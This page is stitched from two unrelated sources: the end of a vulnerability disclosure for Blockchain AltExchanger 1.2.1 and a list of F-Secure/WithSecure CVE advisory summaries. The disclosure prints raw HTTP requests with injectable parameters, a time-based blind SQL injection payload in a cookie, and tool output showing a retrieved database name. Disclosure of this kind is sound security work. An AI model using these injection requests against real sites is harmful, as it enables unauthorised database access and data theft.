[INFO] retrieved: inout_blockchain_altexchanger_dbcurrent database: 'inout_blockchain_altexchanger_db'` <img src="./resources/Blockchain-AltExchanger-121-sqli-1.png"> ## 2- Vulnerable Parameter: marketcurrency (POST) Vulnerability File: /index.php/coins/update_marketboxslider ### HTTP Request:----------------------------------------------------`POST /index.php/coins/update_marketboxslider HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://vulnerable-host.com/Cookie: inoutio_language=4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brContent-Length: 69User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36Host: vulnerable-host.comConnection: Keep-alivedisplaylimit=4&marketcurrency=-INJEQT-SQL-HERE`---------------------------------------------------- ## 3- Vulnerable Parameter: Cookie: inoutio_language (GET) Vulnerability File: /index.php ### HTTP Request:----------------------------------------------------`GET /index.php/home/about HTTP/1.1Referer: https://www.google.com/search?hl=en&q=testingUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36x-requested-with: XMLHttpRequestCookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brHost: vulnerable-host.comConnection: Keep-alive`---------------------------------------------------- ## Timeline```2022-05-03: Discovered the bug2022-05-03: Reported to vendor2022-05-21: Advisory published``` ## Discovered by```Mohamed N. Ali@MohamedNab1lali.mohamed at gmail.com```

Blockchain AltExchanger 1.2.1 SQL Injection

Multiple Denial-of-Service vulnerabilities was discovered in the F-Secure Atlant and in certain WithSecure products while scanning fuzzed PE32-bit files cause memory corruption and heap buffer overflow which eventually can crash the scanning engine. The exploit can be triggered remotely by an attacker.

2022-05-23 CVE-2022-28874: Multiple Denial-of-Service (DoS) Vulnerabilities

Multiple denial-of-service (DoS) vulnerabilities while scanning fuzzed PE32-bit files can eventually crash the scanning engine. 

More 2022-04-25 CVE-2022-28871: Denial-of-Service (DoS) Vulnerability

A denial-of-service (DoS) vulnerability in WithSecure component may crash the scanning engine. 

More 2022-04-13 CVE-2022-22965: Vulnerability in Spring Framework Remote Code Execution affect WithSecure Products

A critical vulnerability in the Spring framework affects the following products: F-Secure Policy Manager, F-Secure Policy Manager for Linux, F-Secure Policy Manager Proxy, and F-Secure Elements Connector.

More 2022-03-07 CVE-2021-44750: Arbitrary Code Execution

WithSecure Support Tool (fsdiag) embedded within various WithSecure products for Microsoft Windows can be abused to execute arbitrary commands on the system.

More 2022-03-01 CVE-2021-44749: Universal Cross-Site Scripting Vulnerability in WithSecure SAFE Browser Protection for Android

Vulnerabilities in the browser protection of WithSecure SAFE for Android could allow remote attacker to steal user's sessions cookie.

More 2022-03-01 CVE-2021-44748: Universal Cross-Site Scripting Vulnerability in WithSecure SAFE Browser for Android

Vulnerabilities in the browser of WithSecure SAFE for Android could allow execution of JavaScript. 

More 2022-02-27 CVE-2021-44747: Denial-of-Service (DoS) Vulnerability

Crash while scanning fuzzed files can cause denial-of-service of the antivirus engine.

More 2022-02-07 CVE-2021-40837: Denial-of-Service (DoS) Vulnerability More 2021-12-20 CVE-2021-40836: Denial-of-Service (DoS) Vulnerability More 2021-12-14 CVE-2021-40835: URL Address Bar Spoofing in F-Secure SAFE Browser for iOS More 2021-12-08 CVE-2021-40834: User interface Spoofing in F-Secure SAFE browser for Android More 2021-11-24 CVE-2021-40833: Denial-of-Service (DoS) Vulnerability More 2021-10-06 CVE-2021-40832: Denial-of-Service (DoS) Vulnerability More 2021-10-06 CVE-2021-33603: Denial-of-Service (DoS) Vulnerability More 2021-10-04 CVE-2021-33602: Denial-of-Service (DoS) Vulnerability More 2021-09-26 CVE-2021-33601: Arbitrary Code Execution in Web Interface of F-Secure Internet Gatekeeper More 2021-09-26 CVE-2021-33600: Denial-of-Service Vulnerability in Web Interface of F-Secure Internet Gatekeeper More 2021-09-01 CVE-2021-33599: Denial-of-Service (DoS) Vulnerability More 2021-08-21 CVE-2021-33598: Denial-of-Service (DoS) Vulnerability More 2021-08-09 CVE-2021-33596: Fake Apple Login Prompt in F-Secure SAFE Browser for iOS More 2021-08-09 CVE-2021-33595: F-Secure SAFE Browser for iOS Vulnerable to Address Bar Spoofing More 2021-08-09 CVE-2021-33594: F-Secure SAFE Browser for Android Vulnerable to Address Bar Spoofing More 2021-08-07 CVE-2021-33597: Denial-of-Service (DoS) Vulnerability More 2021-06-01 CVE-2021-33572: Denial-of-Service (DoS) Vulnerability More 2021-01-25 FSC-2021-1: Reflected Cross-Site Scripting Vulnerability in F-Secure Cloud Protection for Salesforce More 2020-11-10 FSC-2020-3: Multiple Buffer Overflow Vulnerabilities in F-Secure Linux Security

Multiple buffer overflow vulnerabilities can lead local privilege escalation.

More 2020-05-17 FSC-2020-2: Local Non-Root User Can Rename or Delete System FIles in Linux Security

A local user can rename or delete arbitrary files owned by root in Linux Security.

More 2020-05-17 FSC-2020-1: CSRF Vulnerability in Web Interface of Linux Security

Vulnerability in web user interface of the F-Secure Linux Security can lead to remotely disable product settings.

More

Tag

#apple